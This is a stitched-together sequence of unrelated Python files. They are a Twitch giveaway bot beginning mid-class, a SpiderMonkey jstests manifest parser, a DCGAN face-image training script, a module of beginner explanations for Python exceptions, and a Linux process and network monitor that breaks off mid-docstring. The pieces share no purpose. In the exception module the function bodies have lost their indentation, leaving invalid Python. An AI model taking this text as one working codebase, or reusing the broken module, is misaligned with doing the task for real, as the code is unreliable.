        self.SUB_LUCK = config['bot'].getint('SUB_LUCK', fallback=1)
        self.giveaway = None
        self.blacklist = None
        # Serializes admin commands so giveaway state transitions cannot
        # interleave.
        self._lock = asyncio.Lock()
        super().__init__(
            irc_token=self.TMI_TOKEN,
            nick=self.BOT_NICK,
            prefix=self.BOT_PREFIX,
            initial_channels=[self.CHANNEL],
        )

    async def event_pubsub(self, data):
        # PubSub events are not used by this bot.
        pass

    def is_admin(self, user):
        """Return True when the message author is the configured admin."""
        return user.name.lower() == self.ADMIN.lower()

    async def event_ready(self):
        # Created here (not in __init__) so the scoreboard/ignorelist files
        # are loaded once the bot is actually connected.
        self.giveaway = Giveaway(self.SUB_LUCK)
        logger.info(f'Bot {self.nick} ready')

    async def event_message(self, message):
        await self.handle_commands(message)

    @commands.command(name='open', aliases=['o'])
    async def open_command(self, ctx):
        """!open -- start a fresh giveaway round (admin only)."""
        if self.is_admin(ctx.author):
            async with self._lock:
                logger.info('!open')
                if not self.giveaway.opened:
                    self.giveaway.open()
                    await ctx.send_me(f'== Giveaway is opened == Type !giveaway to participate')

    @commands.command(name='reopen', aliases=['reo'])
    async def reopen_command(self, ctx):
        """!reopen -- resume the current round without resetting it (admin only)."""
        if self.is_admin(ctx.author):
            async with self._lock:
                logger.info('!reopen')
                if not self.giveaway.opened:
                    self.giveaway.reopen()
                    # BUG FIX: the announcement misspelled "Hurry up!".
                    await ctx.send_me(f'== Giveaway is RE-opened == Hurry up! Type !giveaway to participate')

    @commands.command(name='close', aliases=['c'])
    async def close_command(self, ctx):
        """!close -- stop entries and save the scoreboard (admin only)."""
        if self.is_admin(ctx.author):
            async with self._lock:
                logger.info('!close')
                if self.giveaway.opened:
                    self.giveaway.close()
                    await ctx.send_me(f'== Giveaway is closed == Pick the winner')

    @commands.command(name='winner', aliases=['w'])
    async def winner_command(self, ctx):
        """!winner -- draw and announce a weighted random winner (admin only)."""
        if self.is_admin(ctx.author):
            async with self._lock:
                logger.info('!winner')
                winner = self.giveaway.winner()
                if winner is not None:
                    await ctx.send_me(f'== The winner is @{winner} ==')
                else:
                    await ctx.send_me(f'== No participants ==')

    @commands.command(name='giveaway', aliases=['ga'])
    async def giveaway_command(self, ctx):
        """!giveaway -- enter the open giveaway."""
        self.giveaway.add(ctx.author.name.lower(), ctx.author.is_subscriber)

    @commands.command(name='scoreboard', aliases=['sb'])
    async def scoreboard_command(self, ctx):
        """!scoreboard -- log every participant's score (admin only)."""
        if self.is_admin(ctx.author):
            async with self._lock:
                logger.info('!scoreboard')
                for name in self.giveaway.participants:
                    logger.info(f'Scoreboard: {name} {self.giveaway.scoreboard.get(name)}')

    @commands.command(name='ignorelist')
    async def ignorelist_command(self, ctx):
        """!ignorelist -- log every ignored user (admin only)."""
        if self.is_admin(ctx.author):
            async with self._lock:
                logger.info('!ignorelist')
                for name in self.giveaway.ignorelist._users:
                    logger.info(f'Ignorelist: {name}')

    @commands.command(name='me')
    async def me_command(self, ctx):
        """!me -- tell the author whether Twitch marks them as a subscriber."""
        if ctx.author.is_subscriber:
            await ctx.send_me(f'==> {ctx.author.name} is sub SeemsGood')
        else:
            await ctx.send_me(f'==> {ctx.author.name} is not sub Kappa')

    async def event_command_error(self, ctx, error):
        # Log the full traceback; never crash the event loop on a bad command.
        logger.error(f'Error: {error}', exc_info=True)
if __name__ == "__main__":
    # Everything (DEBUG and up) goes to bot.log; only INFO and up to stdout.
    to_file = logging.FileHandler('bot.log')
    to_file.setLevel(logging.DEBUG)
    to_console = logging.StreamHandler(sys.stdout)
    to_console.setLevel(logging.INFO)
    logging.basicConfig(
        format='%(asctime)s [%(levelname)s] [%(name)s] %(message)s',
        level=logging.DEBUG,
        handlers=[to_file, to_console],
    )
    bot = Bot()
    bot.run()
|
# Library for JSTest manifests.
#
# This includes classes for representing and parsing JS manifests.
import os, re, sys
from subprocess import *
from tests import TestCase
def split_path_into_dirs(path):
    """Return [path, parent, grandparent, ...] down to the root component.

    Mirrors repeated os.path.split(); the final element is the leftmost
    prefix ('' for a relative path, the root for an absolute one).
    """
    prefixes = [path]
    head, tail = os.path.split(path)
    while tail:
        prefixes.append(head)
        head, tail = os.path.split(head)
    return prefixes
class XULInfo:
    # Build configuration (ABI, OS, debug flag) of the JS shell under test,
    # used when evaluating manifest predicates such as fails-if(...).
    # NOTE: this file is Python 2 (print statements below).
    def __init__(self, abi, os, isdebug):
        self.abi = abi
        self.os = os
        self.isdebug = isdebug
        # Shell tests are never driven through a remote browser process here,
        # so this stays False unless set by a caller.
        self.browserIsRemote = False

    def as_js(self):
        """Return JS that when executed sets up variables so that JS expression
        predicates on XUL build info evaluate properly."""
        return ('var xulRuntime = { OS: "%s", XPCOMABI: "%s", shell: true };' +
                'var isDebugBuild=%s; var Android=%s; var browserIsRemote=%s') % (
            self.os,
            self.abi,
            str(self.isdebug).lower(),
            str(self.os == "Android").lower(),
            str(self.browserIsRemote).lower())

    @classmethod
    def create(cls, jsdir):
        """Create a XULInfo based on the current platform's characteristics."""
        # Our strategy is to find the autoconf.mk generated for the build and
        # read the values from there.

        # Find config/autoconf.mk: search upward from both the current
        # directory and the JS shell directory.
        dirs = split_path_into_dirs(os.getcwd()) + split_path_into_dirs(jsdir)
        path = None
        for dir in dirs:
            _path = os.path.join(dir, 'config/autoconf.mk')
            if os.path.isfile(_path):
                path = _path
                break
        if path == None:
            print "Can't find config/autoconf.mk on a directory containing the JS shell (searched from %s)"%jsdir
            sys.exit(1)

        # Read the values.  Only the three keys named in the regex are
        # extracted; MOZ_DEBUG is treated as a boolean ('1' means debug).
        val_re = re.compile(r'(TARGET_XPCOM_ABI|OS_TARGET|MOZ_DEBUG)\s*=\s*(.*)')
        kw = {}
        for line in open(path):
            m = val_re.match(line)
            if m:
                key, val = m.groups()
                val = val.rstrip()
                if key == 'TARGET_XPCOM_ABI':
                    kw['abi'] = val
                if key == 'OS_TARGET':
                    kw['os'] = val
                if key == 'MOZ_DEBUG':
                    kw['isdebug'] = (val == '1')
        return cls(**kw)
class XULInfoTester:
    """Evaluates manifest predicate expressions by running them in a JS
    shell primed with the build-info variables from a XULInfo."""

    def __init__(self, xulinfo, js_bin):
        self.js_prolog = xulinfo.as_js()
        self.js_bin = js_bin
        # Maps JS expr to evaluation result.
        self.cache = {}

    def test(self, cond):
        """Test a XUL predicate condition against this local info."""
        if cond not in self.cache:
            cmd = [self.js_bin, '-e', self.js_prolog, '-e', 'print(!!(%s))' % cond]
            p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
            out, err = p.communicate()
            if out in ('true\n', 'true\r\n'):
                verdict = True
            elif out in ('false\n', 'false\r\n'):
                verdict = False
            else:
                raise Exception(("Failed to test XUL condition %r;"
                                 + " output was %r, stderr was %r")
                                % (cond, out, err))
            self.cache[cond] = verdict
        return self.cache[cond]
class NullXULInfoTester:
    """Can be used to parse manifests without a JS shell; every predicate
    condition evaluates to False."""

    def test(self, cond):
        # No shell is available, so no condition can ever be confirmed.
        return False
def parse(filename, xul_tester, reldir = ''):
    # Parse a jstests manifest file into a list of TestCase objects.
    #
    # Each non-comment line is either an 'include' directive (parsed
    # recursively), a 'url-prefix' directive (ignored for shell tests), or a
    # test entry: a sequence of annotations (fails, skip, random, slow,
    # fails-if(...), skip-if(...), random-if(...), asserts-if(...),
    # require-or(...), silentfail) followed by 'script <path>'.
    # xul_tester evaluates the predicate conditions; reldir is the directory
    # prefix joined onto each resulting script path.
    ans = []
    comment_re = re.compile(r'#.*')
    dir = os.path.dirname(filename)

    try:
        f = open(filename)
    except IOError:
        # Missing includes are non-fatal: warn and contribute no tests.
        print "warning: include file not found: '%s'"%filename
        return ans

    for line in f:
        # Strip trailing comments before tokenizing.
        sline = comment_re.sub('', line)
        parts = sline.split()
        if len(parts) == 0:
            # line is empty or just a comment, skip
            pass
        elif parts[0] == 'include':
            include_file = parts[1]
            include_reldir = os.path.join(reldir, os.path.dirname(include_file))
            ans += parse(os.path.join(dir, include_file), xul_tester, include_reldir)
        elif parts[0] == 'url-prefix':
            # Doesn't apply to shell tests
            pass
        else:
            # Default state for a test entry before annotations are applied:
            # enabled, expected to pass, deterministic, fast, no debug mode.
            script = None
            enable = True
            expect = True
            random = False
            slow = False
            debugMode = False
            pos = 0
            while pos < len(parts):
                if parts[pos] == 'fails':
                    expect = False
                    pos += 1
                elif parts[pos] == 'skip':
                    expect = enable = False
                    pos += 1
                elif parts[pos] == 'random':
                    random = True
                    pos += 1
                elif parts[pos].startswith('fails-if'):
                    # fails-if(COND): expected to fail only when COND holds.
                    cond = parts[pos][len('fails-if('):-1]
                    if xul_tester.test(cond):
                        expect = False
                    pos += 1
                elif parts[pos].startswith('asserts-if'):
                    # This directive means we may flunk some number of
                    # NS_ASSERTIONs in the browser. For the shell, ignore it.
                    pos += 1
                elif parts[pos].startswith('skip-if'):
                    cond = parts[pos][len('skip-if('):-1]
                    if xul_tester.test(cond):
                        expect = enable = False
                    pos += 1
                elif parts[pos].startswith('random-if'):
                    cond = parts[pos][len('random-if('):-1]
                    if xul_tester.test(cond):
                        random = True
                    pos += 1
                elif parts[pos].startswith('require-or'):
                    # require-or(COND1&&COND2,FALLBACK): all preconditions
                    # must hold, otherwise the fallback action is applied.
                    cond = parts[pos][len('require-or('):-1]
                    (preconditions, fallback_action) = re.split(",", cond)
                    for precondition in re.split("&&", preconditions):
                        if precondition == 'debugMode':
                            debugMode = True
                        elif precondition == 'true':
                            pass
                        else:
                            if fallback_action == "skip":
                                expect = enable = False
                            elif fallback_action == "fail":
                                expect = False
                            elif fallback_action == "random":
                                random = True
                            else:
                                raise Exception("Invalid precondition '%s' or fallback action '%s'" % (precondition, fallback_action))
                            break
                    pos += 1
                elif parts[pos] == 'script':
                    # 'script' consumes the following token as the test path.
                    script = parts[pos+1]
                    pos += 2
                elif parts[pos] == 'slow':
                    slow = True
                    pos += 1
                elif parts[pos] == 'silentfail':
                    # silentfails use tons of memory, and Darwin doesn't support ulimit.
                    if xul_tester.test("xulRuntime.OS == 'Darwin'"):
                        expect = enable = False
                    pos += 1
                else:
                    print 'warning: invalid manifest line element "%s"'%parts[pos]
                    pos += 1
            # Every test entry must name a script.
            assert script is not None
            ans.append(TestCase(os.path.join(reldir, script),
                                enable, expect, random, slow, debugMode))
    return ans
|
# -*- coding: utf-8 -*-
"""
@author: Prabhu <<EMAIL>>
"""
import os
import torch
import torch.nn as nn
import torchvision.transforms as transform
from torch import optim
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import torchvision.datasets as dset
import torchvision.utils as vutils
import numpy as np
from src.generator import Gen
from src.discriminator import Disc
import matplotlib.animation as annime
from IPython.display import HTML, display
import pickle
import argparse
def get_args(argv=None):
    """Parse command-line options for DCGAN training.

    Args:
        argv: optional list of argument strings; defaults to sys.argv[1:].
            Passing a list makes parsing testable without touching the real
            command line (backward-compatible addition).

    Returns:
        argparse.Namespace with `num_epochs` (int, default 10).
    """
    parser = argparse.ArgumentParser("""Train DCGAN for creating fake images""")
    parser.add_argument('-e', "--num_epochs", type=int, default=10)
    args = parser.parse_args(argv)
    return args
# Fixed seed so weight init and dataset shuffling are reproducible.
torch.manual_seed(546)
image_size = 64 # using image size as 64x64 with 3 channel i.e 3x64x64
# path = 'results/performance.txt'
# CelebA images: resize + center-crop to 64x64, then normalize each RGB
# channel from [0, 1] to [-1, 1] via (x - 0.5) / 0.5.
# NOTE(review): assumes the images live under data/celeba/<class>/ as
# required by ImageFolder -- confirm the data layout.
dataset = dset.ImageFolder(root = 'data/celeba', transform = transform.Compose([transform.Resize(image_size),
                                                                                transform.CenterCrop(image_size),
                                                                                transform.ToTensor(),
                                                                                transform.Normalize((0.5,0.5,0.5),
                                                                                                    (0.5,0.5,0.5))]))
datasetLoader = DataLoader(dataset=dataset, batch_size=1024, shuffle=True)
# Prefer the first CUDA device when available, else fall back to CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else 'cpu')
# Save a grid of the first 64 training images as a visual sanity check.
sample = iter(datasetLoader).__next__()
# print(vutils.make_grid(sample[0].to(device)[:64], padding= 2, normalize= True).cpu().size())
# print(sample)
plt.figure(figsize=(8,8))
plt.axis('off')
plt.title("Train set images")
plt.imshow(np.transpose(vutils.make_grid(sample[0].to(device)[:64], padding= 2, normalize= True).cpu(),(1,2,0)))
plt.savefig('fig/sample_image.png')
plt.close()
# initialize weights for Generator and Discriminator networks
def weights_init(m):
    """DCGAN weight initialization, applied via `model.apply(weights_init)`.

    Conv layers get N(0, 0.02) weights; BatchNorm layers get N(1, 0.02)
    scale parameters and zero bias.
    """
    layer_kind = m.__class__.__name__
    if layer_kind.find('Conv') != -1:
        nn.init.normal_(m.weight.data, 0.0, 0.02)
    elif layer_kind.find('BatchNorm') != -1:
        nn.init.normal_(m.weight.data, 1.0, 0.02)
        m.bias.data.fill_(0)
def plot_fig(Gen_losses, Dis_losses):
    """Plot generator/discriminator training-loss curves.

    Args:
        Gen_losses: per-iteration generator losses.
        Dis_losses: per-iteration discriminator losses.

    Saves the figure to fig/Loss_ns.png and returns the result of
    plt.draw().
    """
    plt.figure(figsize=(10,8))
    # BUG FIX: the chart title misspelled "Discriminator".
    plt.title("Generator and Discriminator loss while training")
    plt.plot(Gen_losses, label='G_loss')
    plt.plot(Dis_losses, label = 'D_loss')
    plt.xlabel("Iterations")
    plt.ylabel("Loss")
    plt.legend()
    plt.savefig('fig/Loss_ns.png')
    return plt.draw()
def train(save_performance, opt, weights_init):
    """Train the DCGAN generator/discriminator pair on `datasetLoader`.

    Args:
        save_performance: path of a text file receiving one progress line
            per epoch.
        opt: parsed CLI options; only `opt.num_epochs` is used.
        weights_init: initializer applied to both models via Module.apply.

    Returns:
        List of image grids (one per sampling checkpoint) generated from a
        fixed noise batch, for visualizing training progress.

    Side effects: saves both models under models/, the loss plot under
    fig/, and the loss history under results/losses_ns.pkl.
    """
    model_G = Gen(num_GenFeatureMaps = 64, num_OutputChannels = 3, vector_size = 100).to(device)
    model_D = Disc(num_Channels = 3, num_DisFeaturesMaps = 64, vector_size = 100).to(device)
    model_G.apply(weights_init)
    model_D.apply(weights_init)

    criterion = nn.BCELoss()
    # The same noise batch is reused at every checkpoint so the saved grids
    # show the generator improving on identical latent points.
    fixed_noise = torch.randn(64, 100, 1, 1, device=device)
    real_imgLable = 1
    fake_imgLabel = 0
    optimizerD = optim.Adam(model_D.parameters(), lr= 0.0001, betas=(0.5, 0.999))
    optimizerG = optim.Adam(model_G.parameters(), lr= 0.001, betas=(0.5, 0.999))

    img_list = []
    G_loss = []
    D_loss = []
    iters = 0
    for epoch in range(opt.num_epochs):
        for i, data in enumerate(datasetLoader):
            # Stage 1: train the Discriminator on a real batch and on a fake
            # batch from the Generator, then step its optimizer.
            model_D.zero_grad()
            # Stage 1.1: real batch.
            real_data = data[0].to(device)
            realSize = real_data.shape[0]
            # BUG FIX: BCELoss needs float targets; an integer fill value
            # produces an integer tensor on recent PyTorch versions.
            labels = torch.full((realSize,), float(real_imgLable), device=device)
            # BUG FIX: Tensor.view is NOT in-place.  The original called
            # `.view(-1)` and discarded the result, so the loss compared
            # shape [B, 1, 1, 1] predictions against [B] labels.
            real_predictions = model_D(real_data).view(-1)
            real_errD = criterion(real_predictions, labels)
            real_errD.backward()
            D_x = real_predictions.mean().item()
            # Stage 1.2: fake batch; 100 is the latent vector size fed to
            # the Generator.
            noise = torch.randn(realSize, 100, 1, 1, device=device)
            fake_data = model_G(noise)
            labels.fill_(fake_imgLabel)
            # detach() keeps this backward pass out of the generator graph.
            fake_predictions = model_D(fake_data.detach()).view(-1)
            fake_errD = criterion(fake_predictions, labels)
            fake_errD.backward()
            D_G_z1 = fake_predictions.mean().item()
            errD = real_errD + fake_errD
            optimizerD.step()

            # Stage 2: train the Generator to maximize log(D(G(z))) by
            # labelling its fakes as real, after the Discriminator update.
            model_G.zero_grad()
            labels.fill_(real_imgLable)
            predictionsG = model_D(fake_data).view(-1)
            errG = criterion(predictionsG, labels)
            errG.backward()
            # BUG FIX: the D(G(z)) metric is the mean discriminator output,
            # not the mean of the (scalar) generator loss.
            D_G_z2 = predictionsG.mean().item()
            optimizerG.step()

            print("Iter:[{}/{}]\tEpoch:[{}/{}]\tLossD:{}\tLossG:{}\tD(X):{}\tD(G(z)):{}/{}".format(i+1,len(datasetLoader), epoch+1,opt.num_epochs, errD.item(), errG.item(),D_x, D_G_z1, D_G_z2))
            # Append one progress line per epoch to the performance file.
            if (i+1) % len(datasetLoader) == 0:
                with open(save_performance, 'a') as f:
                    f.write("Iter:[{}/{}]\tEpoch:[{}/{}]\tLossD:{}\tLossG:{}\tD(X):{}\tD(G(z)):{}/{}\n".format(i+1,len(datasetLoader), epoch+1,opt.num_epochs, errD.item(), errG.item(),D_x, D_G_z1, D_G_z2))
            G_loss.append(errG.item())
            D_loss.append(errD.item())
            # Sample fake images every 500 generator updates and at the end
            # of each epoch / of training.
            if (iters % 500 == 0) or ((epoch+1) == opt.num_epochs) or ((i+1) == len(datasetLoader)):
                with torch.no_grad():
                    fake_image = model_G(fixed_noise).detach().cpu()
                img_list.append(vutils.make_grid(fake_image, padding=2, normalize=True))
            iters += 1

    torch.save(model_G, 'models/generator_model_ns')
    torch.save(model_D, 'models/discriminator_model_ns')
    plot_fig(Gen_losses=G_loss, Dis_losses=D_loss)
    losses = {}
    losses['G_loss'] = G_loss
    losses['D_loss'] = D_loss
    with open('results/losses_ns.pkl', 'wb') as f:
        pickle.dump(losses, f)
    return img_list
if __name__ == '__main__':
    opt= get_args()
    # Train, then reload the saved generator and render one grid from
    # fresh noise for a still image.
    img_list = train(save_performance='results/performance.txt', opt=opt, weights_init=weights_init)
    modelG = torch.load('models/generator_model_ns')
    fixed_noise = torch.randn(64, 100, 1,1, device=device)
    fake_image = modelG(fixed_noise).detach().cpu()
    i = vutils.make_grid(fake_image, padding=2, normalize=True)
    plt.imshow(np.transpose(i, (1, 2, 0)), animated=True)
    plt.savefig('fig/fake_images_ns.png')
    # visualize the fake images
    fig = plt.figure(figsize=(8,8))
    plt.axis("off")
    # One animation frame per checkpoint grid collected during training.
    img = [[plt.imshow(np.transpose(i, (1,2,0)),animated= True)] for i in img_list]
    animation_ = annime.ArtistAnimation(fig, img, interval= 1000, repeat_delay= 1000, blit=True)
    print(display(HTML(animation_.to_jshtml()).data))
    print(animation_.to_html5_video(embed_limit=None))
    print('**********************************')
    animation_.save(filename='results/anime_movie_ns')
    # with open('results/fake_images.pkl', 'wb') as f:
    #     pickle.dump(img_list, file=f)
|
<reponame>MrGreenTea/friendly
"""info_generic.py
Generic information about Python exceptions.
"""
from .my_gettext import current_lang, no_information
# Registry of explanation callables, keyed by exception name.
GENERIC = {}


def get_generic_explanation(exception_name):
    """Provides a generic explanation about a particular exception."""
    explain = GENERIC.get(exception_name)
    if explain is not None:
        return explain()
    if exception_name.endswith("Warning"):
        # Unregistered warnings share a single generic message.
        return GENERIC["UnknownWarning"]()
    return no_information()
def register(error_name):
    """Decorator used to record as available an explanation for a given exception.

    Registers the decorated function in GENERIC under error_name and
    returns it unchanged.  (The original returned a pass-through closure
    that added nothing and dropped the function's __name__ and __doc__.)
    """
    def add_exception(function):
        GENERIC[error_name] = function
        return function
    return add_exception
@register("ArithmeticError")
def arithmetic_error():
_ = current_lang.translate
return _(
"`ArithmeticError` is the base class for those built-in exceptions\n"
"that are raised for various arithmetic errors.\n"
"It is unusual that you are seeing this exception;\n"
"normally, a more specific exception should have been raised.\n"
)
@register("AttributeError")
def attribute_error():
_ = current_lang.translate
return _(
"An `AttributeError` occurs when the code contains something like\n"
" `object.x`\n"
"and `x` is not a method or attribute (variable) belonging to `object`.\n"
)
@register("EOFError")
def eof_error():
_ = current_lang.translate
return _(
"An `EOFError` is raised when the `input()` function hits\n"
"an end-of-file condition (EOF) without reading any data.\n"
)
@register("FileNotFoundError")
def file_not_found_error():
_ = current_lang.translate
return _(
"A `FileNotFoundError` exception indicates that you\n"
"are trying to open a file that cannot be found by Python.\n"
"This could be because you misspelled the name of the file.\n"
)
@register("ImportError")
def import_error():
_ = current_lang.translate
return _(
"An `ImportError` exception indicates that a certain object could not\n"
"be imported from a module or package. Most often, this is\n"
"because the name of the object is not spelled correctly.\n"
)
@register("IndentationError")
def indentation_error():
_ = current_lang.translate
return _(
"An `IndentationError` occurs when a given line of code is\n"
"not indented (aligned vertically with other lines) as expected.\n"
)
@register("IndexError")
def index_error():
_ = current_lang.translate
return _(
"An `IndexError` occurs when you try to get an item from a list,\n"
"a tuple, or a similar object (sequence), and use an index which\n"
"does not exist; typically, this happens because the index you give\n"
"is greater than the length of the sequence.\n"
)
@register("KeyError")
def key_error():
_ = current_lang.translate
return _(
"A `KeyError` is raised when a value is not found as a\n"
"key in a Python dict.\n"
)
@register("LookupError")
def lookup_error():
_ = current_lang.translate
return _(
"`LookupError` is the base class for the exceptions that are raised\n"
"when a key or index used on a mapping or sequence is invalid.\n"
"It can also be raised directly by codecs.lookup().\n"
)
@register("ModuleNotFoundError")
def module_not_found_error():
_ = current_lang.translate
return _(
"A `ModuleNotFoundError` exception indicates that you\n"
"are trying to import a module that cannot be found by Python.\n"
"This could be because you misspelled the name of the module\n"
"or because it is not installed on your computer.\n"
)
@register("NameError")
def name_error():
_ = current_lang.translate
return _(
"A `NameError` exception indicates that a variable or\n"
"function name is not known to Python.\n"
"Most often, this is because there is a spelling mistake.\n"
"However, sometimes it is because the name is used\n"
"before being defined or given a value.\n"
)
@register("OverflowError")
def overflow_error():
_ = current_lang.translate
return _(
"An `OverflowError` is raised when the result of an arithmetic operation\n"
"is too large to be handled by the computer's processor.\n"
)
@register("RecursionError")
def recursion_error():
_ = current_lang.translate
return _(
"A `RecursionError` is raised when a function calls itself,\n"
"directly or indirectly, too many times.\n"
"It almost always indicates that you made an error in your code\n"
"and that your program would never stop.\n"
)
@register("SyntaxError")
def syntax_error():
_ = current_lang.translate
return _("A `SyntaxError` occurs when Python cannot understand your code.\n")
@register("TabError")
def tab_error():
_ = current_lang.translate
return _(
"A `TabError` indicates that you have used both spaces\n"
"and tab characters to indent your code.\n"
"This is not allowed in Python.\n"
"Indenting your code means to have block of codes aligned vertically\n"
"by inserting either spaces or tab characters at the beginning of lines.\n"
"Python's recommendation is to always use spaces to indent your code.\n"
)
@register("TypeError")
def type_error():
_ = current_lang.translate
return _(
"A `TypeError` is usually caused by trying\n"
"to combine two incompatible types of objects,\n"
"by calling a function with the wrong type of object,\n"
"or by trying to do an operation not allowed on a given type of object.\n"
)
@register("ValueError")
def value_error():
_ = current_lang.translate
return _(
"A `ValueError` indicates that a function or an operation\n"
"received an argument of the right type, but an inappropriate value.\n"
)
@register("UnboundLocalError")
def unbound_local_error():
_ = current_lang.translate
return _(
"In Python, variables that are used inside a function are known as \n"
"local variables. Before they are used, they must be assigned a value.\n"
"A variable that is used before it is assigned a value is assumed to\n"
"be defined outside that function; it is known as a `global`\n"
"(or sometimes `nonlocal`) variable. You cannot assign a value to such\n"
"a global variable inside a function without first indicating to\n"
"Python that this is a global variable, otherwise you will see\n"
"an `UnboundLocalError`.\n"
)
@register("UnknownWarning")
def unknown_warning():
    """Return the translated fallback text for warnings we have no entry for."""
    _ = current_lang.translate
    return _("No information is available about this warning.\n")
@register("ZeroDivisionError")
def zero_division_error():
    """Return a translated, beginner-friendly explanation of `ZeroDivisionError`."""
    _ = current_lang.translate
    return _(
        "A `ZeroDivisionError` occurs when you are attempting to divide a value\n"
        "by zero either directly or by using some other mathematical operation.\n"
    )
|
<gh_stars>1-10
#!/usr/bin/env python
# encoding: utf-8
'''
monitor.collector -- shortdesc
monitor.collector is a description
It defines classes_and_methods
@author: Yi
@copyright: 2016 MY. All rights reserved.
'''
from subprocess import Popen
from subprocess import PIPE
import logging, time, re, copy
# logging.basicConfig(level=logging.DEBUG)
class Ps:
    """Polls `ps`, `w` and `netstat` in a loop and reports process start/stop
    events and new network connections to a syslog-like sink.

    The sink passed to ``__init__`` must expose ``send(who, message)``.
    """

    # Channel identifiers understood by the syslog sink.
    WHO = 'linux_ps'
    WHO_NET = 'linux_net'
    WHO_CMD = 'linux_cmd'

    def __init__(self, syslog):
        """syslog: object exposing send(who, message)."""
        logging.info("linux file process monitor starting ...")
        logging.info("linux netstat monitor starting ...")
        logging.info("linux command monitor starting ...")
        self.__w_infos = {}   # "user-tty" -> remote host column of `w`
        self.__ps_cur = {}    # pid -> ps fields from the previous poll
        self.__ps_new = {}    # pid -> ps fields from the current poll
        self.__net_cur = {}   # "local-remote" -> netstat fields from previous poll
        self.syslog = syslog

    def start(self, config):
        """Poll forever.

        config must provide ``ps_excludes`` (iterable of command names/substrings
        to ignore), ``net_includes`` (comma-separated whitelisted ports) and
        ``delay`` (seconds between polls).
        """
        while True:
            try:
                self.__do_process(config.ps_excludes)
                self.__do_netstat(config.net_includes)
                time.sleep(config.delay)
            except Exception as e:
                logging.error("linux process monitor error: " + str(e.args))

    def __lookup_ip(self, tty):
        # BUG FIX: the original assigned the boolean result of has_key()
        # instead of the stored value; return the remote IP recorded by `w`
        # for this tty, or localhost when unknown.
        if tty in self.__w_infos:
            return self.__w_infos[tty]
        return '127.0.0.1'

    def __parent_name(self, ppid):
        # Command name of the parent process if it is still tracked, else ''.
        if ppid in self.__ps_cur:
            return self.__ps_cur[ppid][8]
        return ''

    def __do_process(self, ps_excludes):
        """Diff the current `ps` snapshot against the previous one and report
        started/stopped processes and new terminal commands."""
        ptn = re.compile(r"\s+")
        p1 = Popen(["ps", "-efc"], stdout=PIPE)
        p2 = Popen(["w", "-h"], stdout=PIPE)
        output = p2.communicate()[0]
        del p2
        items = output.strip().split("\n")
        for item in items:
            if item:
                infos = ptn.split(item)
                # Map "user-tty" to the remote host column of `w`.
                self.__w_infos[infos[0] + "-" + infos[1]] = infos[2]
        output = p1.communicate()[0]
        del p1
        processes = output.strip().split("\n")
        del_arr = []
        add_arr = []
        self.__ps_new = {}
        for process in processes[1:]:  # skip the ps header line
            if not process:
                continue
            infos = ptn.split(process)
            # Ignore our own helper commands and interpreter processes.
            if infos[8] in ("w", "ps", "[w]", "[ps]", "/usr/bin/python", "python", "[python]"):
                continue
            if infos[8] in ps_excludes:
                continue
            if any(infos[8].find(ps_exclude) != -1 for ps_exclude in ps_excludes):
                continue
            self.__ps_new[infos[1]] = infos  # keyed by pid
        if len(self.__ps_cur) != 0:
            # Diff previous vs current snapshot to find stopped/started processes.
            for c_key in self.__ps_cur:
                if c_key not in self.__ps_new:
                    del_arr.append(self.__ps_cur[c_key])
            for n_key in self.__ps_new:
                if n_key not in self.__ps_cur:
                    add_arr.append(self.__ps_new[n_key])
        logging.debug("current processes count: %d" % len(self.__ps_cur))
        logging.debug("new processes count: %d" % len(self.__ps_new))
        self.__ps_cur = copy.copy(self.__ps_new)
        for add in add_arr:
            ip = self.__lookup_ip(add[6])
            access_time = time.time()
            file_path = add[8]
            pid = add[1]
            process_name = add[8]
            ppid = add[2]
            ppname = self.__parent_name(ppid)
            exec_user = original_user = add[0]
            log = "start %s %s %s %s %s %s %s %s" % (access_time, file_path, pid, process_name, ppid, ppname, exec_user, original_user)
            self.syslog.send(Ps.WHO, log)
        for d in del_arr:
            ip = self.__lookup_ip(d[6])
            access_time = time.time()
            file_path = d[8]
            pid = d[1]
            process_name = d[8]
            ppid = d[2]
            ppname = self.__parent_name(ppid)
            exec_user = original_user = d[0]
            log = "stop %s %s %s %s %s %s %s %s" % (access_time, file_path, pid, process_name, ppid, ppname, exec_user, original_user)
            self.syslog.send(Ps.WHO, log)
        for add in add_arr:
            # Commands launched from a pseudo-terminal are additionally
            # reported on the command channel, including their first argument.
            if add[6].find("pts") == -1:
                continue
            ip = self.__lookup_ip(add[6])
            access_time = time.time()
            file_path = add[8]
            pid = add[1]
            process_name = add[8]
            if len(add) > 9:
                process_name = process_name + "\t" + add[9]
            ppid = add[2]
            ppname = self.__parent_name(ppid)
            exec_user = original_user = add[0]
            log = "%s %s %s %s %s %s" % (access_time, process_name, "", exec_user, original_user, ip)
            self.syslog.send(Ps.WHO_CMD, log)

    def __do_netstat(self, includes):
        """Diff the current `netstat -anp` snapshot against the previous one
        and report new connections; `includes` is a comma-separated port
        whitelist (whitelisted -> status 1, otherwise 2)."""
        ptn = re.compile(r"\s+")
        p1 = Popen(["netstat", "-anp"], stdout=PIPE)
        output = p1.communicate()[0]
        del p1
        processes = output.strip().split("\n")
        add_arr = []
        net_new = {}
        for process in processes[2:]:  # skip the two netstat header lines
            if process:
                if process.find("Active UNIX domain soc") != -1:
                    break  # stop at the UNIX-socket section
                infos = ptn.split(process)
                net_new[infos[3] + "-" + infos[4]] = infos
        if len(self.__net_cur) != 0:
            for n_key in net_new:
                if n_key not in self.__net_cur:
                    add_arr.append(net_new[n_key])
        logging.debug("current networks count: %d" % len(self.__net_cur))
        logging.debug("new networks count: %d" % len(net_new))
        self.__net_cur = copy.copy(net_new)
        for add in add_arr:
            if len(add) < 8:
                # Pad rows missing the state column so indexes line up.
                add.insert(5, "")
            access_time = time.time()
            ip = add[3][:add[3].rfind(":")]
            port = add[3][add[3].rfind(":")+1:]
            pn = add[6].split("/")
            if len(pn) == 2:
                pid = pn[0]
                pname = pn[1]
            else:
                pid = ""
                pname = ""
            # 1 = whitelisted port, 2 = unexpected listener/connection.
            if port in includes.strip().split(","):
                network_status = 1
            else:
                network_status = 2
            log = "%s %s %s %s %s %s %s %s" % (access_time, add[3], add[4], add[5], add[0], pid, pname, network_status)
            self.syslog.send(Ps.WHO_NET, log)
def main():
    """Ad-hoc smoke-test entry point.

    NOTE(review): Ps() expects a syslog-like object with a send() method and
    start() expects a config object with ps_excludes/net_includes/delay
    attributes; the integer arguments below will raise immediately and the
